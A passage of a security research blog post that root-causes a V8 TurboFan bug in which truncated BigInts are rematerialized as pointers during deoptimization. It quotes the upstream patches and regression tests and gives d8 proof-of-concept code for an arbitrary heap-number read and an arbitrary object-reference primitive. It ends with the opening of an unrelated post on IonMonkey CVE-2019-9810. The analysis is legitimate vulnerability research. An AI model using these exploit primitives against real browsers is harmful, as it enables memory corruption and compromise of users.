      4: captured object #0 (length = 7)
           0x0a68d4640439 ; (literal  3) 0x0a68d4640439 <Map(HOLEY_ELEMENTS)>
           0x0a6893080c01 ; (literal  4) 0x0a6893080c01 <FixedArray[0]>
           0x0a6893080c01 ; (literal  4) 0x0a6893080c01 <FixedArray[0]>
           0x0a68930804b1 ; (literal  5) 0x0a68930804b1 <undefined>
           0x0a68930804b1 ; (literal  5) 0x0a68930804b1 <undefined>
           0x0a68930804b1 ; (literal  5) 0x0a68930804b1 <undefined>
           0x0a68930804b1 ; (literal  5) 0x0a68930804b1 <undefined>
      5: 0x002a00000000 ; (literal  6) 42

The deoptimizer uses the translation at index 2 of deoptimization data.

     2                6    NA  BEGIN {frame count=1, js frame count=1, update_feedback_count=0}
                               INTERPRETED_FRAME {bytecode_offset=6, function=0x3ee5e83df701 <String[#8]: add_prop>, height=1, retval=@0(#0)}
                               STACK_SLOT {input=3}
                               STACK_SLOT {input=-2}
                               REGISTER {input=rdx}
                               STACK_SLOT {input=4}
                               CAPTURED_OBJECT {length=7}
                               LITERAL {literal_id=3 (0x3ee5301c0439 <Map(HOLEY_ELEMENTS)>)}
                               LITERAL {literal_id=4 (0x3ee5f5180c01 <FixedArray[0]>)}
                               LITERAL {literal_id=4 (0x3ee5f5180c01 <FixedArray[0]>)}
                               LITERAL {literal_id=5 (0x3ee5f51804b1 <undefined>)}
                               LITERAL {literal_id=5 (0x3ee5f51804b1 <undefined>)}
                               LITERAL {literal_id=5 (0x3ee5f51804b1 <undefined>)}
                               LITERAL {literal_id=5 (0x3ee5f51804b1 <undefined>)}
                               LITERAL {literal_id=6 (42)}

And displays the translated interpreted frame.

  translating interpreted frame add_prop => bytecode_offset=6, variable_frame_size=16, frame_size=80
    0x7ffeeb82e3a8: [top +  72] <- 0x0a6876381579 <JSGlobal Object> ;  stack parameter (input #1)
    0x7ffeeb82e3a0: [top +  64] <- 0x0a6842edf7a9 <String[#9]: different> ;  stack parameter (input #2)
    -------------------------
    0x7ffeeb82e398: [top +  56] <- 0x000105d9e4d2 ;  caller's pc
    0x7ffeeb82e390: [top +  48] <- 0x7ffeeb82e3f0 ;  caller's fp
    0x7ffeeb82e388: [top +  40] <- 0x0a6842ec1831 <NativeContext[244]> ;  context (input #3)
    0x7ffeeb82e380: [top +  32] <- 0x0a6842edfa99 <JSFunction add_prop (sfi = 0xa6842edf881)> ;  function (input #0)
    0x7ffeeb82e378: [top +  24] <- 0x0a6842edfbd1 <BytecodeArray[12]> ;  bytecode array
    0x7ffeeb82e370: [top +  16] <- 0x003b00000000 <Smi 59> ;  bytecode offset
    -------------------------
    0x7ffeeb82e368: [top +   8] <- 0x0a6893080c11 <Odd Oddball: arguments_marker> ;  stack parameter (input #4)
    0x7ffeeb82e360: [top +   0] <- 0x002a00000000 <Smi 42> ;  accumulator (input #5)

After that, it is ready to redirect the execution to the ignition interpreter.

[deoptimizing (eager): end 0x0a6842edfa99 <JSFunction add_prop (sfi = 0xa6842edf881)> @2 => node=6, pc=0x000105d9e9a0, caller sp=0x7ffeeb82e3b0, took 2.698 ms]
Materialization [0x7ffeeb82e368] <- 0x0a6842ee0031 ;  0x0a6842ee0031 <Object map = 0xa68d4640439>

Case study : an incorrect BigInt rematerialization

Back to simplified lowering

Let's have a look at the way FrameState nodes are dealt with during the simplified lowering phase.

FrameState nodes expect 6 inputs :

parameters
- UseInfo is AnyTagged
registers
- UseInfo is AnyTagged
the accumulator
- UseInfo is Any
a context
- UseInfo is AnyTagged
a closure
- UseInfo is AnyTagged
the outer frame state
- UseInfo is AnyTagged

A FrameState has a tagged output representation.

  void VisitFrameState(Node* node) {
    DCHECK_EQ(5, node->op()->ValueInputCount());
    DCHECK_EQ(1, OperatorProperties::GetFrameStateInputCount(node->op()));

    ProcessInput(node, 0, UseInfo::AnyTagged());  // Parameters.
    ProcessInput(node, 1, UseInfo::AnyTagged());  // Registers.

    // Accumulator is a special flower - we need to remember its type in
    // a singleton typed-state-values node (as if it was a singleton
    // state-values node).
    if (propagate()) {
      EnqueueInput(node, 2, UseInfo::Any());
    } else if (lower()) {
      Zone* zone = jsgraph_->zone();
      Node* accumulator = node->InputAt(2);
      if (accumulator == jsgraph_->OptimizedOutConstant()) {
        node->ReplaceInput(2, jsgraph_->SingleDeadTypedStateValues());
      } else {
        ZoneVector<MachineType>* types =
            new (zone->New(sizeof(ZoneVector<MachineType>)))
                ZoneVector<MachineType>(1, zone);
        (*types)[0] = DeoptMachineTypeOf(GetInfo(accumulator)->representation(),
                                         TypeOf(accumulator));

        node->ReplaceInput(
            2, jsgraph_->graph()->NewNode(jsgraph_->common()->TypedStateValues(
                                              types, SparseInputMask::Dense()),
                                          accumulator));
      }
    }

    ProcessInput(node, 3, UseInfo::AnyTagged());  // Context.
    ProcessInput(node, 4, UseInfo::AnyTagged());  // Closure.
    ProcessInput(node, 5, UseInfo::AnyTagged());  // Outer frame state.
    return SetOutput(node, MachineRepresentation::kTagged);
  }

An input node for which the use info is AnyTagged means this input is being used as a tagged value and that the truncation kind is any i.e. no truncation is required (although it may be required to distinguish between zeros).

An input node for which the use info is Any means the input is being used as any kind of value and that the truncation kind is any. No truncation is needed. The input representation is undetermined. That is the most generic case.

// The {UseInfo} class is used to describe a use of an input of a node. 

  static UseInfo AnyTagged() {
    return UseInfo(MachineRepresentation::kTagged, Truncation::Any());
  }
  // Undetermined representation.
  static UseInfo Any() {
    return UseInfo(MachineRepresentation::kNone, Truncation::Any());
  }
  // Value not used.
  static UseInfo None() {
    return UseInfo(MachineRepresentation::kNone, Truncation::None());
  }

const char* Truncation::description() const {
  switch (kind()) {
  // ...
    case TruncationKind::kAny:
      switch (identify_zeros()) {
        case TruncationKind::kNone:
          return "no-value-use";
        // ...
        case kIdentifyZeros:
          return "no-truncation (but identify zeros)";
        case kDistinguishZeros:
          return "no-truncation (but distinguish zeros)";
      }
  }
  // ...
}

If we trace the first phase of simplified lowering (truncation propagation), we'll get the following input :

 visit #46: FrameState (trunc: no-truncation (but distinguish zeros))
   queue #7?: no-truncation (but distinguish zeros)
  initial #45: no-truncation (but distinguish zeros)
   queue #71?: no-truncation (but distinguish zeros)
   queue #4?: no-truncation (but distinguish zeros)
   queue #62?: no-truncation (but distinguish zeros)
   queue #0?: no-truncation (but distinguish zeros)

All the inputs are added to the queue, no truncation is ever propagated. The node #71 corresponds to the accumulator since it is the 3rd input.

 visit #71: BigIntAsUintN (trunc: no-truncation (but distinguish zeros))
   queue #70?: no-value-use

In our example, the accumulator input is a BigIntAsUintN node. Such a node consumes an input which is a word64 and is truncated to a word64.

The astute reader will wonder what happens if this node returns a number that requires more than 64 bits. The answer lies in the inlining phase. Indeed, a JSCall to the BigInt.AsUintN builtin will be reduced to a BigIntAsUintN turbofan operator only in the case where TurboFan is guaranted that the requested width is of 64-bit a most.

This node outputs a word64 and has BigInt as a restriction type. During the type propagation phase, any type computed for a given node will be intersected with its restriction type.

      case IrOpcode::kBigIntAsUintN: {
        ProcessInput(node, 0, UseInfo::TruncatingWord64());
        SetOutput(node, MachineRepresentation::kWord64, Type::BigInt());
        return;
      }

So at this point (after the propagation phase and before the lowering phase), if we focus on the FrameState node and its accumulator input node (3rd input), we can say the following :

the FrameState's 2nd input expects MachineRepresentation::kNone (includes everything, especially kWord64)
the FrameState doesn't truncate its 2nd input
the BigIntAsUintN output representation is kWord64

Because the input 2 is used as Any (with a kNone representation), there won't ever be any conversion of the input node :

  // Converts input {index} of {node} according to given UseInfo {use},
  // assuming the type of the input is {input_type}. If {input_type} is null,
  // it takes the input from the input node {TypeOf(node->InputAt(index))}.
  void ConvertInput(Node* node, int index, UseInfo use,
                    Type input_type = Type::Invalid()) {
    Node* input = node->InputAt(index);
    // In the change phase, insert a change before the use if necessary.
    if (use.representation() == MachineRepresentation::kNone)
      return;  // No input requirement on the use.

So what happens during during the last phase of simplified lowering (the phase that lowers nodes and adds conversions)? If we look at the visitor of FrameState nodes, we can see that eventually the accumulator input may get replaced by a TypedStateValues node. The BigIntAsUintN node is now the input of the TypedStateValues node. No conversion of any kind is ever done.

  ZoneVector<MachineType>* types =
      new (zone->New(sizeof(ZoneVector<MachineType>)))
          ZoneVector<MachineType>(1, zone);
  (*types)[0] = DeoptMachineTypeOf(GetInfo(accumulator)->representation(),
                                   TypeOf(accumulator));

  node->ReplaceInput(
      2, jsgraph_->graph()->NewNode(jsgraph_->common()->TypedStateValues(
                                        types, SparseInputMask::Dense()),
                                    accumulator));

Also, the vector of MachineType is associated to the TypedStateValues. To compute the machine type, DeoptMachineTypeOf relies on the node's type.

In that case (a BigIntAsUintN node), the type will be Type::BigInt().

Type OperationTyper::BigIntAsUintN(Type type) {
  DCHECK(type.Is(Type::BigInt()));
  return Type::BigInt();
}

As we just saw, because for this node the output representation is kWord64 and the type is BigInt, the MachineType is MachineType::AnyTagged.

  static MachineType DeoptMachineTypeOf(MachineRepresentation rep, Type type) {
    // ..
    if (rep == MachineRepresentation::kWord64) {
      if (type.Is(Type::BigInt())) {
        return MachineType::AnyTagged();
      }
// ...
  }

So if we look at the sea of node right after the escape analysis phase and before the simplified lowering phase, it looks like this :

And after the simplified lowering phase, we can confirm that a TypedStateValues node was indeed inserted.

After effect control linearization, the BigIntAsUintN node gets lowered to a Word64And node.

As we learned earlier, the FrameState and TypedStateValues nodes do not directly correspond to any code generation.

void InstructionSelector::VisitNode(Node* node) {
  switch (node->opcode()) {
  // ...
    case IrOpcode::kFrameState:
    case IrOpcode::kStateValues:
    case IrOpcode::kObjectState:
      return;
  // ...

However, other nodes may make use of FrameState and TypedStateValues nodes. This is the case for instance of the various Deoptimize nodes and also Call nodes.

They will make the instruction selector build the necessary FrameStateDescriptor and StateValueList of StateValueDescriptor.

Using those structures, the code generator will then build the necessary DeoptimizationExits to which a Translation will be associated with. The function BuildTranslation will handle the the InstructionOperands in CodeGenerator::AddTranslationForOperand. And this is where the (AnyTagged) MachineType corresponding to the BigIntAsUintN node is used! When building the translation, we are using the BigInt value as if it was a pointer (second branch) and not a double value (first branch)!

void CodeGenerator::AddTranslationForOperand(Translation* translation,
                                             Instruction* instr,
                                             InstructionOperand* op,
                                             MachineType type) {      
  case Constant::kInt64:
        DCHECK_EQ(8, kSystemPointerSize);
        if (type.representation() == MachineRepresentation::kWord64) {
          literal =
              DeoptimizationLiteral(static_cast<double>(constant.ToInt64()));
        } else {
          // When pointers are 8 bytes, we can use int64 constants to represent
          // Smis.
          DCHECK_EQ(MachineRepresentation::kTagged, type.representation());
          Smi smi(static_cast<Address>(constant.ToInt64()));
          DCHECK(smi.IsSmi());
          literal = DeoptimizationLiteral(smi.value());
        }
        break;

This is very interesting because that means at runtime (when deoptimizing), the deoptimizer uses this pointer to rematerialize an object! But since this is a controlled value (the truncated big int), we can make the deoptimizer reference an arbitrary object and thus make the next ignition bytecode handler use (or not) this crafted reference.

In this case, we are playing with the accumulator register. Therefore, to find interesting primitives, what we need to do is to look for all the bytecode handlers that get the accumulator (using a GetAccumulator for instance).

Experiment 1 - reading an arbitrary heap number

The most obvious primitive is the one we get by deoptimizing to the ignition handler for add opcodes.

let addr = BigInt(0x11111111);

function setAddress(val) {
  addr = BigInt(val);
}

function f(x) {
  let y = BigInt.asUintN(49, addr);
  let a = 111;
  try {
    var res = 1.1 + y; // will trigger a deoptimization. reason : "Insufficient type feedback for binary operation"
    return res;
  }
  catch(_){ return y}
}

function compileOnce() {
  f({x:1.1});
  %PrepareFunctionForOptimization(f);
  f({x:1.1});
  %OptimizeFunctionOnNextCall(f);
  return f({x:1.1});
}

When reading the implementation of the handler (BinaryOpAssembler::Generate_AddWithFeedback in src/ic/bin-op-assembler.cc), we observe that for heap numbers additions, the code ends up calling the function LoadHeapNumberValue. In that case, it gets called with an arbitrary pointer.

To demonstrate the bug, we use the %DebugPrint runtime function to get the address of an object (simulate an infoleak primitive) and see that we indeed (incorrectly) read its value.

d8> var a = new Number(3.14); %DebugPrint(a)
0x025f585caa49 <Number map = 000000FB210820A1 value = 0x019d1cb1f631 <HeapNumber 3.14>>
3.14
d8> setAddress(0x025f585caa49)
undefined
d8> compileOnce()
4.24

We can get the same primitive using other kind of ignition bytecode handlers such as +, -,/,* or %.

--- var res = 1.1 + y;
+++ var res = y / 1;

d8> var a = new Number(3.14); %DebugPrint(a)
0x019ca5a8aa11 <Number map = 00000138F15420A1 value = 0x0168e8ddf611 <HeapNumber 3.14>>
3.14
d8> setAddress(0x019ca5a8aa11)
undefined
d8> compileOnce()
3.14

The --trace-ignition debugging utility can be interesting in this scenario. For instance, let's say we use a BigInt value of 0x4200000000 and instead of doing 1.1 + y we do y / 1. Then we want to trace it and confirm the behaviour that we expect.

The trace tells us :

a deoptimization was triggered and why (insufficient type feedback for binary operation, this binary operation being the division)
in the input frame, there is a register entry containing the bigint value thanks to (or because of) the incorrect lowering 11: 0x004200000000 ; rcx 66
in the translated interpreted frame the accumulator gets the value 0x004200000000 (<Smi 66>)
we deoptimize directly to the offset 39 which corresponds to DivSmi [1], [6]

[deoptimizing (DEOPT soft): begin 0x01b141c5f5f1 <JSFunction f (sfi = 000001B141C5F299)> (opt #0) @3, FP to SP delta: 40, caller sp: 0x0042f87fde08]
            ;;; deoptimize at <read_heap_number.js:11:17>, Insufficient type feedback for binary operation
  reading input frame f => bytecode_offset=39, args=2, height=8, retval=0(#0); inputs:
      0: 0x01b141c5f5f1 ;  [fp -  16]  0x01b141c5f5f1 <JSFunction f (sfi = 000001B141C5F299)>
      1: 0x03a35e2c1349 ;  [fp +  24]  0x03a35e2c1349 <JSGlobal Object>
      2: 0x03a35e2cb3b1 ;  [fp +  16]  0x03a35e2cb3b1 <Object map = 0000019FAF409DF1>
      3: 0x01b141c5f551 ;  [fp -  24]  0x01b141c5f551 <ScriptContext[5]>
      4: 0x03a35e2cb3d1 ; rdi 0x03a35e2cb3d1 <BigInt 283467841536>
      5: 0x00422b840df1 ; (literal  2) 0x00422b840df1 <Odd Oddball: optimized_out>
      6: 0x00422b840df1 ; (literal  2) 0x00422b840df1 <Odd Oddball: optimized_out>
      7: 0x01b141c5f551 ;  [fp -  24]  0x01b141c5f551 <ScriptContext[5]>
      8: 0x00422b840df1 ; (literal  2) 0x00422b840df1 <Odd Oddball: optimized_out>
      9: 0x00422b840df1 ; (literal  2) 0x00422b840df1 <Odd Oddball: optimized_out>
     10: 0x00422b840df1 ; (literal  2) 0x00422b840df1 <Odd Oddball: optimized_out>
     11: 0x004200000000 ; rcx 66
  translating interpreted frame f => bytecode_offset=39, height=64
    0x0042f87fde00: [top + 120] <- 0x03a35e2c1349 <JSGlobal Object> ;  stack parameter (input #1)
    0x0042f87fddf8: [top + 112] <- 0x03a35e2cb3b1 <Object map = 0000019FAF409DF1> ;  stack parameter (input #2)
    -------------------------
    0x0042f87fddf0: [top + 104] <- 0x7ffd93f64c1d ;  caller's pc
    0x0042f87fdde8: [top +  96] <- 0x0042f87fde38 ;  caller's fp
    0x0042f87fdde0: [top +  88] <- 0x01b141c5f551 <ScriptContext[5]> ;  context (input #3)
    0x0042f87fddd8: [top +  80] <- 0x01b141c5f5f1 <JSFunction f (sfi = 000001B141C5F299)> ;  function (input #0)
    0x0042f87fddd0: [top +  72] <- 0x01b141c5fa41 <BytecodeArray[61]> ;  bytecode array
    0x0042f87fddc8: [top +  64] <- 0x005c00000000 <Smi 92> ;  bytecode offset
    -------------------------
    0x0042f87fddc0: [top +  56] <- 0x03a35e2cb3d1 <BigInt 283467841536> ;  stack parameter (input #4)
    0x0042f87fddb8: [top +  48] <- 0x00422b840df1 <Odd Oddball: optimized_out> ;  stack parameter (input #5)
    0x0042f87fddb0: [top +  40] <- 0x00422b840df1 <Odd Oddball: optimized_out> ;  stack parameter (input #6)
    0x0042f87fdda8: [top +  32] <- 0x01b141c5f551 <ScriptContext[5]> ;  stack parameter (input #7)
    0x0042f87fdda0: [top +  24] <- 0x00422b840df1 <Odd Oddball: optimized_out> ;  stack parameter (input #8)
    0x0042f87fdd98: [top +  16] <- 0x00422b840df1 <Odd Oddball: optimized_out> ;  stack parameter (input #9)
    0x0042f87fdd90: [top +   8] <- 0x00422b840df1 <Odd Oddball: optimized_out> ;  stack parameter (input #10)
    0x0042f87fdd88: [top +   0] <- 0x004200000000 <Smi 66> ;  accumulator (input #11)
[deoptimizing (soft): end 0x01b141c5f5f1 <JSFunction f (sfi = 000001B141C5F299)> @3 => node=39, pc=0x7ffd93f65100, caller sp=0x0042f87fde08, took 2.328 ms]
 -> 000001B141C5FA9D @   39 : 43 01 06          DivSmi [1], [6]
      [ accumulator -> 66 ]
      [ accumulator <- 66 ]
 -> 000001B141C5FAA0 @   42 : 26 f9             Star r2
      [ accumulator -> 66 ]
      [          r2 <- 66 ]
 -> 000001B141C5FAA2 @   44 : a9                Return 
      [ accumulator -> 66 ]

Experiment 2 - getting an arbitrary object reference

This bug also gives a better, more powerful, primitive. Indeed, if instead of deoptimizing back to an add handler, we deoptimize to Builtins_StaKeyedPropertyHandler, we'll be able to store an arbitrary object reference in an object property. Therefore, if an attacker is also able to leverage an infoleak primitive, he would be able to craft any arbitrary object (these are sometimes referred to as addressof and fakeobj primitives) .

In order to deoptimize to this specific handler, aka deoptimize on obj[x] = y, we have to make this line do something that violates a speculation. If we repeatedly call the function f with the same property name, TurboFan will speculate that we're always gonna add the same property. Once the code is optimized, using a property with a different name will violate this assumption, call the deoptimizer and then redirect execution to the StaKeyedProperty handler.

let addr = BigInt(0x11111111);

function setAddress(val) {
  addr = BigInt(val);
}

function f(x) {
  let y = BigInt.asUintN(49, addr);
  let a = 111;
  try {
    var obj = {};
    obj[x] = y;
    return obj;
  }
  catch(_){ return y}
}

function compileOnce() {
  f("foo");
  %PrepareFunctionForOptimization(f);
  f("foo");
  f("foo");
  f("foo");
  f("foo");
  %OptimizeFunctionOnNextCall(f);
  f("foo");
  return f("boom"); // deopt reason : wrong name
}

To experiment, we simply simulate the infoleak primitive by simply using a runtime function %DebugPrint and adding an ArrayBuffer to the object. That should not be possible since the javascript code is actually adding a truncated BigInt.

d8> var a = new ArrayBuffer(8); %DebugPrint(a);
0x003d5ef8ab79 <ArrayBuffer map = 00000354B09C2191>
[object ArrayBuffer]
d8> setAddress(0x003d5ef8ab79)
undefined
d8> var badobj = compileOnce()
undefined
d8> %DebugPrint(badobj)
0x003d5ef8d159 <Object map = 00000354B09C9F81>
{boom: [object ArrayBuffer]}
d8> badobj.boom
[object ArrayBuffer]

~~Et voila!~~ Sweet as!

Variants

We saw with the first commit that the pattern affected FrameState nodes but also StateValues nodes.

Another commit further fixed the exact same bug affecting ObjectState nodes.

From 3ce6be027562ff6641977d7c9caa530c74a279ac Mon Sep 17 00:00:00 2001
From: Nico Hartmann <[email protected]>
Date: Tue, 26 Nov 2019 13:17:45 +0100
Subject: [PATCH] [turbofan] Fixes crash caused by truncated bigint

Bug: chromium:1028191
Change-Id: Idfcd678b3826fb6238d10f1e4195b02be35c3010
Reviewed-on: https://chromium-review.googlesource.com/c/v8/v8/+/1936468
Commit-Queue: Nico Hartmann <[email protected]>
Reviewed-by: Georg Neis <[email protected]>
Cr-Commit-Position: refs/heads/master@{#65173}
---

diff --git a/src/compiler/simplified-lowering.cc b/src/compiler/simplified-lowering.cc
index 4c000af..f271469 100644
--- a/src/compiler/simplified-lowering.cc
+++ b/src/compiler/simplified-lowering.cc
@@ -1254,7 +1254,13 @@
   void VisitObjectState(Node* node) {
     if (propagate()) {
       for (int i = 0; i < node->InputCount(); i++) {
-        EnqueueInput(node, i, UseInfo::Any());
+        // TODO(nicohartmann): Remove, once the deoptimizer can rematerialize
+        // truncated BigInts.
+        if (TypeOf(node->InputAt(i)).Is(Type::BigInt())) {
+          EnqueueInput(node, i, UseInfo::AnyTagged());
+        } else {
+          EnqueueInput(node, i, UseInfo::Any());
+        }
       }
     } else if (lower()) {
       Zone* zone = jsgraph_->zone();
@@ -1265,6 +1271,11 @@
         Node* input = node->InputAt(i);
         (*types)[i] =
             DeoptMachineTypeOf(GetInfo(input)->representation(), TypeOf(input));
+        // TODO(nicohartmann): Remove, once the deoptimizer can rematerialize
+        // truncated BigInts.
+        if (TypeOf(node->InputAt(i)).Is(Type::BigInt())) {
+          ConvertInput(node, i, UseInfo::AnyTagged());
+        }
       }
       NodeProperties::ChangeOp(node, jsgraph_->common()->TypedObjectState(
                                          ObjectIdOf(node->op()), types));
diff --git a/test/mjsunit/regress/regress-1028191.js b/test/mjsunit/regress/regress-1028191.js
new file mode 100644
index 0000000..543028a
--- /dev/null
+++ b/test/mjsunit/regress/regress-1028191.js
@@ -0,0 +1,23 @@
+// Copyright 2019 the V8 project authors. All rights reserved.
+// Use of this source code is governed by a BSD-style license that can be
+// found in the LICENSE file.
+
+// Flags: --allow-natives-syntax
+
+"use strict";
+
+function f(a, b, c) {
+  let x = BigInt.asUintN(64, a + b);
+  try {
+    x + c;
+  } catch(_) {
+    eval();
+  }
+  return x;
+}
+
+%PrepareFunctionForOptimization(f);
+assertEquals(f(3n, 5n), 8n);
+assertEquals(f(8n, 12n), 20n);
+%OptimizeFunctionOnNextCall(f);
+assertEquals(f(2n, 3n), 5n);

Interestingly, other bugs in the representation changers got triggered by very similars PoCs. The fix simply adds a call to InsertConversion so as to insert a ChangeUint64ToBigInt node when necessary.

From 8aa588976a1c4e593f0074332f5b1f7020656350 Mon Sep 17 00:00:00 2001
From: Nico Hartmann <[email protected]>
Date: Thu, 12 Dec 2019 10:06:19 +0100
Subject: [PATCH] [turbofan] Fixes rematerialization of truncated BigInts

Bug: chromium:1029530
Change-Id: I12aa4c238387f6a47bf149fd1a136ea83c385f4b
Reviewed-on: https://chromium-review.googlesource.com/c/v8/v8/+/1962278
Auto-Submit: Nico Hartmann <[email protected]>
Commit-Queue: Georg Neis <[email protected]>
Reviewed-by: Georg Neis <[email protected]>
Cr-Commit-Position: refs/heads/master@{#65434}
---

diff --git a/src/compiler/representation-change.cc b/src/compiler/representation-change.cc
index 99b3d64..9478e15 100644
--- a/src/compiler/representation-change.cc
+++ b/src/compiler/representation-change.cc
@@ -175,6 +175,15 @@
     }
   }

+  // Rematerialize any truncated BigInt if user is not expecting a BigInt.
+  if (output_type.Is(Type::BigInt()) &&
+      output_rep == MachineRepresentation::kWord64 &&
+      use_info.type_check() != TypeCheckKind::kBigInt) {
+    node =
+        InsertConversion(node, simplified()->ChangeUint64ToBigInt(), use_node);
+    output_rep = MachineRepresentation::kTaggedPointer;
+  }
+
   switch (use_info.representation()) {
     case MachineRepresentation::kTaggedSigned:
       DCHECK(use_info.type_check() == TypeCheckKind::kNone ||
diff --git a/test/mjsunit/regress/regress-1029530.js b/test/mjsunit/regress/regress-1029530.js
new file mode 100644
index 0000000..918a9ec
--- /dev/null
+++ b/test/mjsunit/regress/regress-1029530.js
@@ -0,0 +1,40 @@
+// Copyright 2019 the V8 project authors. All rights reserved.
+// Use of this source code is governed by a BSD-style license that can be
+// found in the LICENSE file.
+
+// Flags: --allow-natives-syntax --interrupt-budget=1024
+
+{
+  function f() {
+    const b = BigInt.asUintN(4,3n);
+    let i = 0;
+    while(i < 1) {
+      i + 1;
+      i = b;
+    }
+  }
+
+  %PrepareFunctionForOptimization(f);
+  f();
+  f();
+  %OptimizeFunctionOnNextCall(f);
+  f();
+}
+
+
+{
+  function f() {
+    const b = BigInt.asUintN(4,10n);
+    let i = 0.1;
+    while(i < 1.8) {
+      i + 1;
+      i = b;
+    }
+  }
+
+  %PrepareFunctionForOptimization(f);
+  f();
+  f();
+  %OptimizeFunctionOnNextCall(f);
+  f();
+}

An inlining bug was also patched. Indeed, a call to BigInt.asUintN would get inlined even when no value argument is given (as in BigInt.asUintN(bits,no_value_argument_here)). Therefore a call to GetValueInput would be made on a non-existing input! The fix simply adds a check on the number of inputs.

Node* value = NodeProperties::GetValueInput(node, 3); // input 3 may not exist!

An interesting fact to point out is that none of those PoCs would actually correctly execute. They would trigger exceptions that need to get caught. This leads to interesting behaviours from TurboFan that optimizes 'invalid' code.

Digression on pointer compression

In our small experiments, we used standard tagged pointers. To distinguish small integers (Smis) from heap objects, V8 uses the lowest bit of an object address.

Up until V8 8.0, it looks like this :

Smi:                   [32 bits] [31 bits (unused)]  |  0
Strong HeapObject:                        [pointer]  | 01
Weak HeapObject:                          [pointer]  | 11

However, with V8 8.0 comes pointer compression. It is going to be shipped with the upcoming M80 stable release. Starting from this version, Smis and compressed pointers are stored as 32-bit values :

Smi:                                      [31 bits]  |  0
Strong HeapObject:                        [30 bits]  | 01
Weak HeapObject:                          [30 bits]  | 11

As described in the design document, a compressed pointer corresponds to the first 32-bits of a pointer to which we add a base address when decompressing.

Let's quickly have a look by inspecting the memory ourselves. Note that DebugPrint displays uncompressed pointers.

d8> var a = new Array(1,2,3,4)
undefined
d8> %DebugPrint(a)
DebugPrint: 0x16a4080c5f61: [JSArray]
 - map: 0x16a4082817e9 <Map(PACKED_SMI_ELEMENTS)> [FastProperties]
 - prototype: 0x16a408248f25 <JSArray[0]>
 - elements: 0x16a4080c5f71 <FixedArray[4]> [PACKED_SMI_ELEMENTS]
 - length: 4
 - properties: 0x16a4080406e1 <FixedArray[0]> {
    #length: 0x16a4081c015d <AccessorInfo> (const accessor descriptor)
 }
 - elements: 0x16a4080c5f71 <FixedArray[4]> {
           0: 1
           1: 2
           2: 3
           3: 4
 }

If we look in memory, we'll actually find compressed pointers, which are 32-bit values.

(lldb) x/10wx 0x16a4080c5f61-1
0x16a4080c5f60: 0x082817e9 0x080406e1 0x080c5f71 0x00000008
0x16a4080c5f70: 0x080404a9 0x00000008 0x00000002 0x00000004
0x16a4080c5f80: 0x00000006 0x00000008

To get the full address, we need to know the base.

(lldb) register read r13
     r13 = 0x000016a400000000

And we can manually uncompress a pointer by doing base+compressed_pointer (and obviously we substract 1 to untag the pointer).

(lldb) x/10wx $r13+0x080c5f71-1
0x16a4080c5f70: 0x080404a9 0x00000008 0x00000002 0x00000004
0x16a4080c5f80: 0x00000006 0x00000008 0x08040549 0x39dc599e
0x16a4080c5f90: 0x00000adc 0x7566280a

Because now on a 64-bit build Smis are on 32-bits with the lsb set to 0, we need to shift their values by one.

Also, raw pointers are supported. An example of raw pointer is the backing store pointer of an array buffer.

d8> var a = new ArrayBuffer(0x40); 
d8> var v = new Uint32Array(a);
d8> v[0] = 0x41414141

d8> %DebugPrint(a)
DebugPrint: 0x16a4080c7899: [JSArrayBuffer]
 - map: 0x16a408281181 <Map(HOLEY_ELEMENTS)> [FastProperties]
 - prototype: 0x16a4082476f5 <Object map = 0x16a4082811a9>
 - elements: 0x16a4080406e1 <FixedArray[0]> [HOLEY_ELEMENTS]
 - embedder fields: 2
 - backing_store: 0x107314fd0
 - byte_length: 64
 - detachable
 - properties: 0x16a4080406e1 <FixedArray[0]> {}
 - embedder fields = {
    0, aligned pointer: 0x0
    0, aligned pointer: 0x0
 }

(lldb) x/10wx 0x16a4080c7899-1
0x16a4080c7898: 0x08281181 0x080406e1 0x080406e1 0x00000040
0x16a4080c78a8: 0x00000000 0x07314fd0 0x00000001 0x00000002
0x16a4080c78b8: 0x00000000 0x00000000

We indeed find the full raw pointer in memory (raw | 00).

(lldb) x/2wx 0x0000000107314fd0
0x107314fd0: 0x41414141 0x00000000

Conclusion

We went through various components of V8 in this article such as Ignition, TurboFan's simplified lowering phase as well as how deoptimization works. Understanding this is interesting because it allows us to grasp the actual underlying root cause of the bug we studied. At first, the base trigger looks very simple but it actually involves quite a few interesting mechanisms.

However, even though this bug gives a very interesting primitive, unfortunately it does not provide any good infoleak primitive. Therefore, it would need to be combined with another bug (obviously, we don't want to use any kind of heap spraying).

Special thanks to my mates Axel Souchet, Dougall J, Bill K, yrp604 and Mark Dowd for reviewing this article and kudos to the V8 team for building such an amazing JavaScript engine!

Please feel free to contact me on twitter if you've got any feedback or question!

Also, my team at Trenchant aka Azimuth Security is hiring so don't hesitate to reach out if you're interested :) (DMs are open, otherwise jf at company dot com with company being azimuthsecurity)

References

Technical documents

Bugs

Diary of a reverse-engineer
A journey into IonMonkey: root-causing CVE-2019-9810.Axel "0vercl0k" Souchet
17 June 2019 at 15:00

A journey into IonMonkey: root-causing CVE-2019-9810.

Diary of a reverse-engineer

By: Axel "0vercl0k" Souchet

17 June 2019 at 15:00

A journey into IonMonkey: root-causing CVE-2019-9810.

Introduction

In May, I wanted to play with BigInt and evaluate how I could use them for browser exploitation. The exploit I wrote for the blazefox relied on a Javascript library developed by @5aelo that allows code to manipulate 64-bit integers. Around the same time ZDI had released a PoC for CVE-2019-9810 which is an issue in IonMonkey (Mozilla's speculative JIT engine) that was discovered and used by the magicians Richard Zhu and Amat Cama during Pwn2Own2019 for compromising Mozilla's web-browser.

This was the perfect occasion to write an exploit and add BigInt support in my utility script. You can find the actual exploit on my github in the following repository: CVE-2019-9810.

Once I was done with it, I felt that it was also a great occasion to dive into Ion and get to know each other. The original exploit was written without understanding one bit of the root-cause of the issue and unwinding this sounded like a nice exercise. This is basically what this blogpost is about, me exploring Ion's code-base and investigating the root-cause of CVE-2019-9810.

The title of the issue "IonMonkey MArraySlice has incorrect alias information" sounds to suggest that the root of the issue concerns some alias information and the fix of the issue also points at Ion's AliasAnalysis optimization pass.

Before starting, if you guys want to follow the source-code at home without downloading the whole of Spidermonkey’s / Firefox’s source-code I have set-up the woboq code browser on an S3 bucket here: ff-woboq - just remember that the snapshot has the fix for the issue we are discussing. Last but not least, I've noticed that IonMonkey gets decent code-churn and as a result some of the functions I mention below can be appear with a slightly different name on the latest available version.

All right, buckle up and enjoy the read!

Table of contents:

A journey into IonMonkey: root-causing CVE-2019-9810.

Speculative optimizing JIT compiler

